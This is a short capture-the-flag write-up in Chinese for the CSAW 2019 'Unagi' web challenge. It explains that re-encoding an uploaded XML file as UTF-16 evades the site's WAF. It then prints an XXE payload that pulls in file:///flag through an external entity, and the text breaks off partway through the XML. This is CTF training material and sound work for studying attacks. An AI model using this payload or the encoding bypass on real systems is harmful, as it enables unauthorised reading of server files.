[CSAWQual 2019]Web_Unagi
只能上传xml文件,考虑存在xxe
直接上传显示waf拦截了,转换成utf16编码就能绕过
<!--filename:1.xml-->
<!--author:ta3shi-->
<!DOCTYPE users[
<!ENTITY a SYSTEM "file:///flag">
]>
<users>
<user>
<username>Alice</username>
<password>passwd1</password>
<name>&a;</name>
<email>&a;</email>
<intro>&a;</intro>
<group>&a;</group>
</user>
<user>
<username>bob</username>
<password>passwd2</